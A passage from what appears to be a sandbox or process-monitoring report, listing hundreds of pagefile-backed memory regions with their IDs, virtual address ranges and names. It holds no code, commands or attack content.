"pagefile_0x00000000064e0000" filename = "" Region: id = 3203 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3204 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3205 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3206 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3207 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3208 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3209 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3210 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3211 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3212 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3213 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3214 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3215 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3216 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3217 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3218 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3219 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3220 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3221 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3222 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3223 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3224 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3225 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3226 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3227 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3228 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3229 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3230 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3231 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3232 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3233 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3234 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3235 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3236 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3237 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3238 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3239 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3240 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3241 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3242 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3243 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3244 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3245 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3246 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3247 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3248 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3249 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3250 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3251 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3252 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3253 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3254 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3255 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3256 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3257 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3258 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3259 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3260 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3261 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3262 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3263 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3264 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3265 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3266 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3267 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3268 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3269 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3270 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3271 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3272 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3273 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3274 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3275 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3276 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3277 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3278 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3279 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3280 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3281 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3282 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3283 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3284 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3285 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3286 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3287 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3288 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3289 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3290 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3291 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3292 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3293 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3294 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3295 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3296 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3297 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3298 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3299 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3300 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3301 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3302 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3303 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3304 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3305 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3306 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3307 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3308 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3309 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3310 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3311 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3312 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3313 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3314 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3315 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3316 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3317 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3318 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3319 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3320 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3321 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3322 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3323 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3324 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3325 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3326 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3327 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3328 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3329 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3330 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3331 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3332 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3333 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3334 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3335 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3336 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3337 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3338 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3339 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3340 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3341 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3342 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3343 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3344 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3345 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3346 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3347 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3348 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3349 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3350 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3351 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3352 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3353 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3354 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3355 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3356 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3357 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3358 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3359 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3360 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3361 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3362 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3363 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3364 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3365 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3366 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3367 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3368 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3369 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3370 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3371 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3372 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3373 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3374 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3375 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3376 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3377 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3378 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3379 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3380 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3381 start_va = 0x64e0000 end_va = 